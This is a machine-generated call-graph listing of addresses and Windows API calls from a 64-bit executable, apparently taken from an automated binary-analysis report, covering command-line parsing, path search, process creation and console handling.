7ff706ecc08c 18508->18512 18509->18501 18513 7ff706ecc211 18510->18513 18511->18486 18514 7ff706ecc094 wcsrchr 18512->18514 18517 7ff706ecc0ad 18512->18517 18515 7ff706ec33f0 _vsnwprintf 18513->18515 18514->18517 18516 7ff706ecc22c 18515->18516 18518 7ff706eb3278 166 API calls 18516->18518 18517->18517 18519 7ff706ecc0e0 _wcsnicmp 18517->18519 18520 7ff706ecc106 18517->18520 18518->18469 18519->18517 18521 7ff706ebff70 2 API calls 18520->18521 18522 7ff706ecc13b 18521->18522 18522->18497 18523 7ff706ecc146 SearchPathW 18522->18523 18523->18497 18524 7ff706ecc188 18523->18524 18525 7ff706ec26e0 19 API calls 18524->18525 18525->18526 18526->18498 18528 7ff706eb88fc 18527->18528 18530 7ff706eb88cf 18527->18530 18528->18338 18531 7ff706ec0a6c 18528->18531 18529 7ff706eb88df _wcsicmp 18529->18530 18530->18528 18530->18529 18532 7ff706ec1ea0 8 API calls 18531->18532 18533 7ff706ec0ab9 18532->18533 18534 7ff706ec0b12 memset 18533->18534 18536 7ff706ecd927 18533->18536 18537 7ff706ec0aee _wcsnicmp 18533->18537 18540 7ff706ec128f ??_V@YAXPEAX 18533->18540 18535 7ff706ebca40 17 API calls 18534->18535 18538 7ff706ec0b5a 18535->18538 18539 7ff706ec081c 166 API calls 18536->18539 18537->18534 18537->18536 18542 7ff706ebb364 17 API calls 18538->18542 18545 7ff706ecd94e 18538->18545 18541 7ff706ecd933 18539->18541 18541->18534 18541->18540 18543 7ff706ec0b6f 18542->18543 18543->18540 18543->18545 18546 7ff706ec0b8c wcschr 18543->18546 18550 7ff706ec0c0f wcsrchr 18543->18550 18557 7ff706ebcd90 166 API calls 18543->18557 18558 7ff706ec081c 166 API calls 18543->18558 18559 7ff706ec3060 171 API calls 18543->18559 18560 7ff706ebd3f0 223 API calls 18543->18560 18561 7ff706ebaf74 170 API calls 18543->18561 18562 7ff706ec0d71 wcsrchr 18543->18562 18564 7ff706ec1ea0 8 API calls 18543->18564 18566 7ff706ec0fb1 wcsrchr 18543->18566 18567 7ff706ec0fd0 wcschr 18543->18567 18570 7ff706ec10fd wcsrchr 18543->18570 18577 7ff706ec2eb4 22 API calls 18543->18577 18580 7ff706ec1087 _wcsicmp 18543->18580 18582 7ff706ecda74 18543->18582 19078 7ff706ec3bac 18543->19078 19082 7ff706ec291c GetDriveTypeW 18543->19082 19085 7ff706ec2efc 18543->19085 18544 7ff706ecd96b ??_V@YAXPEAX 18544->18545 18545->18544 18549 7ff706ecd99a wcschr 18545->18549 18551 7ff706ecda64 18545->18551 18552 7ff706ecd9ca GetFileAttributesW 18545->18552 18554 7ff706ecd9fd ??_V@YAXPEAX 18545->18554 18546->18543 18549->18545 18550->18543 18550->18545 18552->18545 18552->18551 18553 7ff706ecda90 GetFileAttributesW 18553->18545 18555 7ff706ecdaa8 GetLastError 18553->18555 18554->18545 18555->18551 18556 7ff706ecdab9 18555->18556 18556->18545 18557->18543 18558->18543 18559->18543 18560->18543 18561->18543 18562->18543 18563 7ff706ec0d97 NeedCurrentDirectoryForExePathW 18562->18563 18563->18543 18563->18545 18564->18543 18566->18543 18566->18567 18567->18551 18568 7ff706ec0fed wcschr 18567->18568 18568->18543 18568->18551 18570->18543 18571 7ff706ec111a _wcsicmp 18570->18571 18572 7ff706ec1138 _wcsicmp 18571->18572 18573 7ff706ec123d 18571->18573 18572->18573 18574 7ff706ec10c5 18572->18574 18575 7ff706ec1175 18573->18575 18578 7ff706ec1250 ??_V@YAXPEAX 18573->18578 18574->18575 18576 7ff706ec1169 ??_V@YAXPEAX 18574->18576 18579 7ff706ec8f80 7 API calls 18575->18579 18576->18575 18577->18543 18578->18575 18581 7ff706ec1189 18579->18581 18580->18582 18583 7ff706ec10a7 _wcsicmp 18580->18583 18581->18338 18582->18551 18582->18553 18583->18574 18583->18582 18585 7ff706eb7279 18584->18585 18586 7ff706eb7211 _setjmp 18584->18586 18585->18344 18586->18585 18588 7ff706eb7265 18586->18588 19099 7ff706eb72b0 18588->19099 18591 7ff706ebbd6f 18590->18591 18595 7ff706ebbda2 18590->18595 18591->18595 18614 7ff706edeaf0 18591->18614 18593 7ff706ecc4ab 18594 7ff706eb3240 166 API calls 18593->18594 18593->18595 18596 7ff706ecc4bc 18594->18596 18595->18371 18596->18595 18597 7ff706eb3240 166 API calls 18596->18597 18597->18596 18599 7ff706ebcb63 18598->18599 18600 7ff706ebcd90 166 API calls 18599->18600 18601 7ff706ebc848 18600->18601 18601->18370 18602 7ff706ebcad4 18601->18602 18603 7ff706ebcad9 18602->18603 18611 7ff706ebcb05 18602->18611 18604 7ff706ebcd90 166 API calls 18603->18604 18603->18611 18605 7ff706ecc722 18604->18605 18606 7ff706ecc72e GetConsoleTitleW 18605->18606 18605->18611 18607 7ff706ecc74a 18606->18607 18606->18611 18608 7ff706ebb6b0 170 API calls 18607->18608 18613 7ff706ecc778 18608->18613 18609 7ff706ecc7ec 18610 7ff706ebff70 2 API calls 18609->18610 18610->18611 18611->18370 18612 7ff706ecc7dd SetConsoleTitleW 18612->18609 18613->18609 18613->18612 18615 7ff706eb3410 18 API calls 18614->18615 18616 7ff706edeb1e 18615->18616 18617 7ff706ebb998 207 API calls 18616->18617 18618 7ff706edeb2e 18617->18618 18618->18593 18620 7ff706ececd4 GetLastError 18619->18620 18621 7ff706ec42ab UpdateProcThreadAttribute 18619->18621 18622 7ff706ececee 18620->18622 18623 7ff706ececf0 GetLastError 18621->18623 18624 7ff706ec42eb memset memset GetStartupInfoW 18621->18624 18720 7ff706ed9eec 18623->18720 18626 7ff706ec3a90 170 API calls 18624->18626 18628 7ff706ec43a8 18626->18628 18629 7ff706ebb900 166 API calls 18628->18629 18630 7ff706ec43bb 18629->18630 18631 7ff706ec4638 _local_unwind 18630->18631 18635 7ff706ec43cc 18630->18635 18631->18635 18632 7ff706ec43de wcsrchr 18633 7ff706ec43f7 lstrcmpW 18632->18633 18640 7ff706ec4415 18632->18640 18636 7ff706ec4668 18633->18636 18633->18640 18635->18632 18635->18640 18708 7ff706ed9044 18636->18708 18637 7ff706ec441a 18639 7ff706ec442a CreateProcessW 18637->18639 18642 7ff706ec4596 CreateProcessAsUserW 18637->18642 18641 7ff706ec448b 18639->18641 18707 7ff706ec5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18640->18707 18643 7ff706ec4672 GetLastError 18641->18643 18644 7ff706ec4495 CloseHandle 18641->18644 18642->18641 18652 7ff706ec468d 18643->18652 18645 7ff706ec498c 8 API calls 18644->18645 18646 7ff706ec44c5 18645->18646 18650 7ff706ec44cd 18646->18650 18646->18652 18647 7ff706ec47a3 18647->18424 18648 7ff706ec44f8 18648->18647 18651 7ff706ec4612 18648->18651 18654 7ff706ec5cb4 7 API calls 18648->18654 18649 7ff706ebcd90 166 API calls 18653 7ff706ec4724 18649->18653 18650->18647 18650->18648 18668 7ff706eda250 33 API calls 18650->18668 18655 7ff706ec461c 18651->18655 18657 7ff706ec47e1 CloseHandle 18651->18657 18652->18649 18652->18650 18656 7ff706ec472c _local_unwind 18653->18656 18665 7ff706ec473d 18653->18665 18658 7ff706ec4517 18654->18658 18660 7ff706ebff70 GetProcessHeap RtlFreeHeap 18655->18660 18656->18665 18657->18655 18659 7ff706ec33f0 _vsnwprintf 18658->18659 18661 7ff706ec4544 18659->18661 18662 7ff706ec47fa DeleteProcThreadAttributeList 18660->18662 18664 7ff706ec498c 8 API calls 18661->18664 18663 7ff706ec8f80 7 API calls 18662->18663 18666 7ff706ec4820 18663->18666 18667 7ff706ec4558 18664->18667 18671 7ff706ebff70 GetProcessHeap RtlFreeHeap 18665->18671 18666->18424 18669 7ff706ec4564 18667->18669 18670 7ff706ec47ae 18667->18670 18668->18648 18672 7ff706ec498c 8 API calls 18669->18672 18673 7ff706ec33f0 _vsnwprintf 18670->18673 18674 7ff706ec475b _local_unwind 18671->18674 18675 7ff706ec4577 18672->18675 18673->18651 18674->18650 18675->18655 18676 7ff706ec457f 18675->18676 18677 7ff706eda920 210 API calls 18676->18677 18678 7ff706ec4584 18677->18678 18678->18655 18680 7ff706ec5c45 18679->18680 18681 7ff706ec5c4e 18679->18681 18680->18681 18682 7ff706ecf470 SetConsoleTitleW 18680->18682 18681->18427 18682->18681 18704 7ff706eb9737 18683->18704 18685 7ff706eb977d memset 18687 7ff706ebca40 17 API calls 18685->18687 18686 7ff706ebcd90 166 API calls 18686->18704 18687->18704 18688 7ff706ecb76e 18691 7ff706eb3278 166 API calls 18688->18691 18689 7ff706ecb7b3 18690 7ff706ecb79a 18693 7ff706ec855c ??_V@YAXPEAX 18690->18693 18694 7ff706ecb787 18691->18694 18692 7ff706ebb364 17 API calls 18692->18704 18693->18689 18695 7ff706ecb795 18694->18695 18810 7ff706ede944 18694->18810 18818 7ff706ed7694 18695->18818 18700 7ff706eb986d 18702 7ff706eb9880 ??_V@YAXPEAX 18700->18702 18703 7ff706eb988c 18700->18703 18702->18703 18705 7ff706ec8f80 7 API calls 18703->18705 18704->18685 18704->18686 18704->18688 18704->18689 18704->18690 18704->18692 18704->18700 18722 7ff706ec1fac memset 18704->18722 18749 7ff706ebce10 18704->18749 18799 7ff706eb96b4 18704->18799 18804 7ff706ec5920 18704->18804 18706 7ff706eb989d 18705->18706 18706->18424 18709 7ff706ec3a90 170 API calls 18708->18709 18710 7ff706ed9064 18709->18710 18711 7ff706ed9083 18710->18711 18712 7ff706ed906e 18710->18712 18714 7ff706ebcd90 166 API calls 18711->18714 18713 7ff706ec498c 8 API calls 18712->18713 18719 7ff706ed9081 18713->18719 18715 7ff706ed909b 18714->18715 18716 7ff706ec498c 8 API calls 18715->18716 18715->18719 18717 7ff706ed90ec 18716->18717 18718 7ff706ebff70 2 API calls 18717->18718 18718->18719 18719->18640 18721 7ff706eced0a DeleteProcThreadAttributeList 18720->18721 18721->18622 18724 7ff706ec203b 18722->18724 18723 7ff706ec20b0 18726 7ff706ec3060 171 API calls 18723->18726 18728 7ff706ec211c 18723->18728 18724->18723 18725 7ff706ec2094 18724->18725 18727 7ff706ec20a6 18725->18727 18729 7ff706eb3278 166 API calls 18725->18729 18726->18728 18731 7ff706ec8f80 7 API calls 18727->18731 18728->18727 18730 7ff706ec2e44 2 API calls 18728->18730 18729->18727 18733 7ff706ec2148 18730->18733 18732 7ff706ec2325 18731->18732 18732->18704 18733->18727 18824 7ff706ec2d70 18733->18824 18736 7ff706ebb900 166 API calls 18738 7ff706ec21d0 18736->18738 18737 7ff706ece04a ??_V@YAXPEAX 18737->18727 18738->18737 18739 7ff706ec221c wcsspn 18738->18739 18747 7ff706ec22a4 ??_V@YAXPEAX 18738->18747 18741 7ff706ebb900 166 API calls 18739->18741 18742 7ff706ec223b 18741->18742 18742->18737 18745 7ff706ec2252 18742->18745 18743 7ff706ebd3f0 223 API calls 18743->18747 18744 7ff706ece06d wcschr 18744->18745 18745->18744 18746 7ff706ece090 towupper 18745->18746 18748 7ff706ec228f 18745->18748 18746->18745 18746->18748 18747->18727 18748->18743 18750 7ff706ebd0f8 18749->18750 18781 7ff706ebce5b 18749->18781 18751 7ff706ec8f80 7 API calls 18750->18751 18753 7ff706ebd10a 18751->18753 18752 7ff706ecc860 18754 7ff706ecc97c 18752->18754 18757 7ff706edee88 390 API calls 18752->18757 18753->18704 18756 7ff706ede9b4 197 API calls 18754->18756 18758 7ff706ecc981 longjmp 18756->18758 18759 7ff706ecc879 18757->18759 18760 7ff706ecc99a 18758->18760 18761 7ff706ecc882 EnterCriticalSection LeaveCriticalSection 18759->18761 18762 7ff706ecc95c 18759->18762 18760->18750 18763 7ff706ecc9b3 ??_V@YAXPEAX 18760->18763 18765 7ff706ebd0e3 18761->18765 18762->18754 18766 7ff706eb96b4 186 API calls 18762->18766 18763->18750 18765->18704 18766->18762 18767 7ff706ebceaa _tell 18769 7ff706ebd208 _close 18767->18769 18768 7ff706ebcd90 166 API calls 18768->18781 18769->18781 18770 7ff706ecc9d5 18908 7ff706edd610 18770->18908 18772 7ff706ebb900 166 API calls 18772->18781 18774 7ff706ecca07 18775 7ff706ede91c 198 API calls 18774->18775 18780 7ff706ecca0c 18775->18780 18776 7ff706edbfec 176 API calls 18777 7ff706ecc9f1 18776->18777 18779 7ff706eb3240 166 API calls 18777->18779 18778 7ff706ebcf33 memset 18778->18781 18779->18774 18780->18704 18781->18750 18781->18752 18781->18760 18781->18765 18781->18768 18781->18770 18781->18772 18781->18778 18782 7ff706ebca40 17 API calls 18781->18782 18783 7ff706ebd184 wcschr 18781->18783 18784 7ff706edbfec 176 API calls 18781->18784 18785 7ff706ebd1a7 wcschr 18781->18785 18786 7ff706ecc9c9 18781->18786 18789 7ff706ec0a6c 273 API calls 18781->18789 18790 7ff706ebbe00 635 API calls 18781->18790 18791 7ff706ec3448 166 API calls 18781->18791 18792 7ff706ebcfab _wcsicmp 18781->18792 18793 7ff706ec0580 12 API calls 18781->18793 18797 7ff706ec1fac 238 API calls 18781->18797 18798 7ff706ebd044 ??_V@YAXPEAX 18781->18798 18834 7ff706ec0494 18781->18834 18847 7ff706ebdf60 18781->18847 18867 7ff706ed778c 18781->18867 18898 7ff706edc738 18781->18898 18782->18781 18783->18781 18784->18781 18785->18781 18787 7ff706ec855c ??_V@YAXPEAX 18786->18787 18787->18750 18789->18781 18790->18781 18791->18781 18792->18781 18794 7ff706ebd003 GetConsoleOutputCP GetCPInfo 18793->18794 18795 7ff706ec04f4 3 API calls 18794->18795 18795->18781 18797->18781 18798->18781 18800 7ff706ecb6e2 RevertToSelf CloseHandle 18799->18800 18801 7ff706eb96c8 18799->18801 18802 7ff706eb96ce 18801->18802 18803 7ff706eb6a48 184 API calls 18801->18803 18802->18704 18803->18801 18805 7ff706ec5a12 18804->18805 18806 7ff706ec596c 18804->18806 18805->18704 18806->18805 18807 7ff706ec598d VirtualQuery 18806->18807 18807->18805 18809 7ff706ec59ad 18807->18809 18808 7ff706ec59b7 VirtualQuery 18808->18805 18808->18809 18809->18805 18809->18808 18811 7ff706ede954 18810->18811 18812 7ff706ede990 18810->18812 18814 7ff706edee88 390 API calls 18811->18814 18813 7ff706ede9b4 197 API calls 18812->18813 18815 7ff706ede995 longjmp 18813->18815 18816 7ff706ede964 18814->18816 18816->18812 18817 7ff706eb96b4 186 API calls 18816->18817 18817->18816 18822 7ff706ed76a3 18818->18822 18819 7ff706ed76b7 18821 7ff706ede9b4 197 API calls 18819->18821 18820 7ff706eb96b4 186 API calls 18820->18822 18823 7ff706ed76bc longjmp 18821->18823 18822->18819 18822->18820 18825 7ff706ec2da3 18824->18825 18826 7ff706ec2d89 18824->18826 18825->18826 18828 7ff706ec2dbc GetProcessHeap RtlFreeHeap 18825->18828 18829 7ff706ec21af 18826->18829 18830 7ff706ec2e0c 18826->18830 18828->18825 18828->18826 18829->18736 18831 7ff706ec2e11 18830->18831 18832 7ff706ec2e32 18830->18832 18831->18832 18833 7ff706ece494 VirtualFree 18831->18833 18832->18826 18835 7ff706ec04a4 18834->18835 18836 7ff706ec26e0 19 API calls 18835->18836 18837 7ff706ec04b9 _get_osfhandle SetFilePointer 18835->18837 18838 7ff706ecd845 18835->18838 18839 7ff706ecd839 18835->18839 18841 7ff706eb3278 166 API calls 18835->18841 18836->18835 18837->18781 18840 7ff706edf1d8 166 API calls 18838->18840 18842 7ff706eb3278 166 API calls 18839->18842 18843 7ff706ecd837 18840->18843 18844 7ff706ecd819 _getch 18841->18844 18842->18843 18844->18835 18845 7ff706ecd832 18844->18845 18917 7ff706edbde4 EnterCriticalSection LeaveCriticalSection 18845->18917 18848 7ff706ebdfe2 18847->18848 18849 7ff706ebdf93 18847->18849 18851 7ff706ebe100 VirtualFree 18848->18851 18852 7ff706ebe00b _setjmp 18848->18852 18849->18848 18850 7ff706ebdf9f GetProcessHeap RtlFreeHeap 18849->18850 18850->18848 18850->18849 18851->18848 18853 7ff706ebe04a 18852->18853 18861 7ff706ebe0c3 18852->18861 18918 7ff706ebe600 18853->18918 18855 7ff706ebe073 18856 7ff706ebe081 18855->18856 18857 7ff706ebe0e0 longjmp 18855->18857 18927 7ff706ebd250 18856->18927 18858 7ff706ebe0b0 18857->18858 18858->18861 18958 7ff706edd3fc 18858->18958 18861->18767 18864 7ff706ebe600 473 API calls 18865 7ff706ebe0a7 18864->18865 18865->18858 18866 7ff706edd610 167 API calls 18865->18866 18866->18858 18885 7ff706ed77bc 18867->18885 18868 7ff706ed7aca 18871 7ff706ec34a0 166 API calls 18868->18871 18869 7ff706ed79c0 18875 7ff706ec34a0 166 API calls 18869->18875 18873 7ff706ed7adb 18871->18873 18872 7ff706ed7ab5 18876 7ff706ec3448 166 API calls 18872->18876 18878 7ff706ed7af0 18873->18878 18882 7ff706ec3448 166 API calls 18873->18882 18874 7ff706ed7984 18874->18869 18879 7ff706ed7989 18874->18879 18881 7ff706ed79d6 18875->18881 18891 7ff706ed79ef 18876->18891 18877 7ff706ed7a00 18883 7ff706ed7a0b 18877->18883 18877->18891 18897 7ff706ed7a33 18877->18897 18880 7ff706ed778c 166 API calls 18878->18880 18879->18891 19054 7ff706ed76e0 18879->19054 18884 7ff706ed7afb 18880->18884 18886 7ff706ec3448 166 API calls 18881->18886 18896 7ff706ed79e7 18881->18896 18882->18878 18888 7ff706ec34a0 166 API calls 18883->18888 18883->18891 18884->18879 18889 7ff706ec3448 166 API calls 18884->18889 18885->18868 18885->18869 18885->18872 18885->18874 18885->18877 18885->18879 18885->18891 18892 7ff706ec3448 166 API calls 18885->18892 18894 7ff706ed778c 166 API calls 18885->18894 18886->18896 18893 7ff706ed7a23 18888->18893 18889->18879 18890 7ff706ec3448 166 API calls 18890->18891 18891->18781 18892->18885 18895 7ff706ed778c 166 API calls 18893->18895 18894->18885 18895->18896 19050 7ff706ed7730 18896->19050 18897->18890 18899 7ff706edc775 18898->18899 18905 7ff706edc7ab 18898->18905 18900 7ff706ebcd90 166 API calls 18899->18900 18901 7ff706edc781 18900->18901 18902 7ff706edc8d4 18901->18902 18903 7ff706ebb0d8 194 API calls 18901->18903 18902->18781 18903->18902 18904 7ff706ebb6b0 170 API calls 18904->18905 18905->18901 18905->18902 18905->18904 18906 7ff706ebb038 _dup2 18905->18906 18907 7ff706ebd208 _close 18905->18907 18906->18905 18907->18905 18909 7ff706edd635 18908->18909 18910 7ff706edd63d 18908->18910 18913 7ff706edd672 longjmp 18909->18913 18914 7ff706ecc9da 18909->18914 18911 7ff706edd658 18910->18911 18912 7ff706edd64a 18910->18912 18911->18909 18916 7ff706eb3278 166 API calls 18911->18916 18915 7ff706eb3278 166 API calls 18912->18915 18913->18914 18914->18774 18914->18776 18915->18909 18916->18909 18919 7ff706ebe60f 18918->18919 18920 7ff706ecccca longjmp 18919->18920 18976 7ff706ebef40 18919->18976 18924 7ff706ebe637 18920->18924 18922 7ff706ebe626 18922->18920 18922->18924 18923 7ff706ec3448 166 API calls 18925 7ff706ecccfe 18923->18925 18924->18923 18926 7ff706ebe65f 18924->18926 18925->18855 18926->18855 18928 7ff706ebd267 18927->18928 18933 7ff706ebd2d3 18927->18933 18929 7ff706ebd284 _wcsicmp 18928->18929 18935 7ff706ebd2a6 18928->18935 18931 7ff706ebd32b 18929->18931 18929->18935 18930 7ff706ebe600 473 API calls 18930->18933 18934 7ff706ebe600 473 API calls 18931->18934 18931->18935 18932 7ff706ebd316 18932->18858 18932->18864 18933->18928 18933->18930 18936 7ff706ebd305 18933->18936 18934->18931 18935->18932 18937 7ff706ebef40 472 API calls 18935->18937 18936->18932 18938 7ff706ebe600 473 API calls 18936->18938 18943 7ff706ebedf8 18937->18943 18938->18928 18939 7ff706ecd0a2 longjmp 18940 7ff706ecd0c5 18939->18940 18941 7ff706ec3448 166 API calls 18940->18941 18942 7ff706ecd0d4 18941->18942 18943->18939 18943->18940 18944 7ff706ebee68 18943->18944 18945 7ff706ebeeb1 18943->18945 18947 7ff706ebef40 472 API calls 18944->18947 18948 7ff706ebe600 473 API calls 18945->18948 18953 7ff706ebeec2 18945->18953 18957 7ff706ebeece 18945->18957 18946 7ff706ebcd90 166 API calls 18949 7ff706ebeee7 18946->18949 18947->18932 18948->18945 18950 7ff706ebef31 18949->18950 18951 7ff706ebeeef 18949->18951 18952 7ff706ede91c 198 API calls 18950->18952 18954 7ff706ebe600 473 API calls 18951->18954 18955 7ff706ebef36 18952->18955 18956 7ff706ebef40 472 API calls 18953->18956 18954->18932 18955->18939 18956->18957 18957->18932 18957->18946 18973 7ff706edd419 18958->18973 18959 7ff706eccadf 18960 7ff706edd576 18961 7ff706edd592 18960->18961 18971 7ff706edd555 18960->18971 18962 7ff706ec3448 166 API calls 18961->18962 18965 7ff706edd5a5 18962->18965 18963 7ff706edd5c4 18967 7ff706ec3448 166 API calls 18963->18967 18968 7ff706edd5ba 18965->18968 18970 7ff706ec3448 166 API calls 18965->18970 18966 7ff706edd541 18966->18961 18969 7ff706edd546 18966->18969 18967->18959 19020 7ff706edd36c 18968->19020 18969->18963 18969->18971 18970->18968 19027 7ff706edd31c 18971->19027 18973->18959 18973->18960 18973->18961 18973->18963 18973->18966 18973->18971 18974 7ff706edd3fc 166 API calls 18973->18974 18975 7ff706ec3448 166 API calls 18973->18975 18974->18973 18975->18973 18977 7ff706ebef71 18976->18977 18978 7ff706ecd1f3 18977->18978 18979 7ff706ebf130 18977->18979 18985 7ff706ebef87 18977->18985 18978->18922 18980 7ff706ec3448 166 API calls 18979->18980 19006 7ff706ebf10e 18979->19006 19018 7ff706ebf046 18980->19018 18981 7ff706ebf433 18983 7ff706ebf8c0 456 API calls 18981->18983 18982 7ff706ebf438 18987 7ff706ebf860 456 API calls 18982->18987 18982->19018 18983->18982 18984 7ff706ebeff2 iswspace 18984->18985 18986 7ff706ebf01f wcschr 18984->18986 18985->18978 18985->18981 18985->18982 18985->18984 18985->18986 18985->19018 18986->19018 18987->19018 18988 7ff706ebf558 iswspace 18991 7ff706ebf6cd wcschr 18988->18991 18988->19018 18989 7ff706ebf0c4 iswdigit 18990 7ff706ebf5aa 18989->18990 18998 7ff706ebf0ea 18989->18998 18993 7ff706ebf860 456 API calls 18990->18993 18991->19018 18992 7ff706ebf471 18994 7ff706ebf860 456 API calls 18992->18994 19004 7ff706ebf4af 18993->19004 18994->18998 18995 7ff706ebf1b7 iswspace 18995->18989 18997 7ff706ebf1ce wcschr 18995->18997 18996 7ff706ebf1fc iswdigit 18996->19018 18997->18989 18997->18996 18999 7ff706ebf860 456 API calls 18998->18999 18998->19006 19002 7ff706ebf4a6 18999->19002 19000 7ff706ebf8c0 456 API calls 19000->19018 19001 7ff706ebf370 19003 7ff706eb3278 166 API calls 19001->19003 19001->19006 19002->19004 19007 7ff706ebf860 456 API calls 19002->19007 19003->18978 19005 7ff706ebf860 456 API calls 19004->19005 19004->19006 19008 7ff706ebf632 iswspace 19005->19008 19006->18922 19007->19004 19008->19004 19009 7ff706ebf648 wcschr 19008->19009 19009->19004 19011 7ff706ebf65f iswdigit 19009->19011 19010 7ff706ebf32f iswspace 19010->19001 19013 7ff706ebf342 wcschr 19010->19013 19011->19006 19014 7ff706ebf67b 19011->19014 19012 7ff706ebf2b8 iswdigit 19012->19018 19013->19001 19013->19012 19015 7ff706ebf860 456 API calls 19014->19015 19015->19006 19016 7ff706ebf3d2 iswspace 19017 7ff706ebf3e9 wcschr 19016->19017 19016->19018 19017->19018 19018->18988 19018->18989 19018->18990 19018->18992 19018->18995 19018->18996 19018->18998 19018->19000 19018->19001 19018->19010 19018->19012 19018->19016 19019 7ff706ebf860 456 API calls 19018->19019 19019->19018 19021 7ff706edd381 19020->19021 19022 7ff706edd3d8 19020->19022 19023 7ff706ec34a0 166 API calls 19021->19023 19026 7ff706edd390 19023->19026 19024 7ff706ec3448 166 API calls 19024->19026 19025 7ff706ec34a0 166 API calls 19025->19026 19026->19022 19026->19024 19026->19025 19026->19026 19028 7ff706ec3448 166 API calls 19027->19028 19029 7ff706edd33b 19028->19029 19030 7ff706edd36c 166 API calls 19029->19030 19031 7ff706edd343 19030->19031 19032 7ff706edd3fc 166 API calls 19031->19032 19049 7ff706edd34e 19032->19049 19033 7ff706edd5c2 19033->18959 19034 7ff706edd576 19035 7ff706edd592 19034->19035 19046 7ff706edd555 19034->19046 19036 7ff706ec3448 166 API calls 19035->19036 19039 7ff706edd5a5 19036->19039 19037 7ff706edd5c4 19041 7ff706ec3448 166 API calls 19037->19041 19038 7ff706edd31c 166 API calls 19038->19033 19042 7ff706edd5ba 19039->19042 19045 7ff706ec3448 166 API calls 19039->19045 19040 7ff706edd541 19040->19035 19043 7ff706edd546 19040->19043 19041->19033 19047 7ff706edd36c 166 API calls 19042->19047 19043->19037 19043->19046 19044 7ff706ec3448 166 API calls 19044->19049 19045->19042 19046->19038 19047->19033 19048 7ff706edd3fc 166 API calls 19048->19049 19049->19033 19049->19034 19049->19035 19049->19037 19049->19040 19049->19044 19049->19046 19049->19048 19052 7ff706ed773c 19050->19052 19051 7ff706ed777d 19051->18891 19052->19051 19053 7ff706ec3448 166 API calls 19052->19053 19053->19052 19055 7ff706ed778c 166 API calls 19054->19055 19056 7ff706ed76fb 19055->19056 19057 7ff706ed771c 19056->19057 19058 7ff706ec3448 166 API calls 19056->19058 19057->18891 19059 7ff706ed7711 19058->19059 19060 7ff706ed778c 166 API calls 19059->19060 19060->19057 19062 7ff706ebc486 19061->19062 19063 7ff706ebc4c9 19061->19063 19064 7ff706ebc48e wcschr 19062->19064 19068 7ff706ebc161 19062->19068 19066 7ff706ebff70 2 API calls 19063->19066 19063->19068 19065 7ff706ebc4ef 19064->19065 19064->19068 19067 7ff706ebcd90 166 API calls 19065->19067 19066->19068 19074 7ff706ebc4f9 19067->19074 19068->18431 19068->18455 19069 7ff706ebc5bd 19070 7ff706ebc541 19069->19070 19073 7ff706ebb6b0 170 API calls 19069->19073 19070->19068 19072 7ff706ebff70 2 API calls 19070->19072 19071 7ff706ebd840 178 API calls 19071->19074 19072->19068 19073->19070 19074->19068 19074->19069 19074->19070 19074->19071 19076 7ff706ebb018 19075->19076 19076->18492 19077->18492 19079 7ff706ec3bfe 19078->19079 19081 7ff706ec3bcf 19078->19081 19079->18543 19080 7ff706ec3bdc wcschr 19080->19079 19080->19081 19081->19079 19081->19080 19083 7ff706ec8f80 7 API calls 19082->19083 19084 7ff706ec296b 19083->19084 19084->18543 19086 7ff706ec2f2a 19085->19086 19087 7ff706ec2f97 19085->19087 19089 7ff706ec823c 10 API calls 19086->19089 19087->19086 19088 7ff706ec2f9c wcschr 19087->19088 19090 7ff706ec2fb6 wcschr 19088->19090 19097 7ff706ec2f5a 19088->19097 19091 7ff706ec2f56 19089->19091 19090->19086 19090->19097 19092 7ff706ec3a0c 2 API calls 19091->19092 19091->19097 19094 7ff706ec2fe0 19092->19094 19093 7ff706ec8f80 7 API calls 19095 7ff706ec2f83 19093->19095 19096 7ff706ec2fe9 wcsrchr 19094->19096 19094->19097 19095->18543 19096->19097 19097->19093 19098 7ff706ece4ec 19097->19098 19100 7ff706ed4621 19099->19100 19101 7ff706eb72de 19099->19101 19103 7ff706ed47e0 19100->19103 19104 7ff706ed447b longjmp 19100->19104 19107 7ff706ed4639 19100->19107 19116 7ff706ed475e 19100->19116 19102 7ff706eb72eb 19101->19102 19110 7ff706ed4530 19101->19110 19111 7ff706ed4467 19101->19111 19160 7ff706eb7348 19102->19160 19106 7ff706eb7348 168 API calls 19103->19106 19108 7ff706ed4492 19104->19108 19159 7ff706ed4524 19106->19159 19112 7ff706ed4695 19107->19112 19113 7ff706ed463e 19107->19113 19114 7ff706eb7348 168 API calls 19108->19114 19115 7ff706eb7348 168 API calls 19110->19115 19111->19102 19111->19108 19118 7ff706ed4475 19111->19118 19123 7ff706eb73d4 168 API calls 19112->19123 19113->19104 19124 7ff706ed4654 19113->19124 19131 7ff706ed44a8 19114->19131 19126 7ff706ed4549 19115->19126 19119 7ff706eb7348 168 API calls 19116->19119 19117 7ff706eb7315 19175 7ff706eb73d4 19117->19175 19118->19104 19118->19112 19119->19103 19120 7ff706eb7348 168 API calls 19120->19117 19121 7ff706eb72b0 168 API calls 19127 7ff706ed480e 19121->19127 19140 7ff706ed469a 19123->19140 19132 7ff706eb7348 168 API calls 19124->19132 19125 7ff706ed45b2 19128 7ff706eb7348 168 API calls 19125->19128 19126->19125 19147 7ff706eb7348 168 API calls 19126->19147 19148 7ff706ed455e 19126->19148 19127->18585 19130 7ff706ed45c7 19128->19130 19129 7ff706eb72b0 168 API calls 19137 7ff706ed4738 19129->19137 19134 7ff706eb7348 168 API calls 19130->19134 19135 7ff706eb7348 168 API calls 19131->19135 19143 7ff706ed44e2 19131->19143 19138 7ff706eb7323 19132->19138 19133 7ff706eb7348 168 API calls 19133->19125 19142 7ff706ed45db 19134->19142 19135->19143 19136 7ff706eb72b0 168 API calls 19144 7ff706ed44f1 19136->19144 19141 7ff706eb7348 168 API calls 19137->19141 19138->18585 19139 7ff706ed46e1 19139->19129 19140->19139 19149 7ff706ed46c7 19140->19149 19150 7ff706ed46ea 19140->19150 19141->19159 19145 7ff706eb7348 168 API calls 19142->19145 19143->19136 19146 7ff706eb72b0 168 API calls 19144->19146 19151 7ff706ed45ec 19145->19151 19152 7ff706ed4503 19146->19152 19147->19148 19148->19125 19148->19133 19149->19139 19156 7ff706eb7348 168 API calls 19149->19156 19153 7ff706eb7348 168 API calls 19150->19153 19154 7ff706eb7348 168 API calls 19151->19154 19152->19138 19155 7ff706eb7348 168 API calls 19152->19155 19153->19139 19157 7ff706ed4600 19154->19157 19155->19159 19156->19139 19158 7ff706eb7348 168 API calls 19157->19158 19158->19159 19159->19121 19159->19138 19162 7ff706eb735d 19160->19162 19161 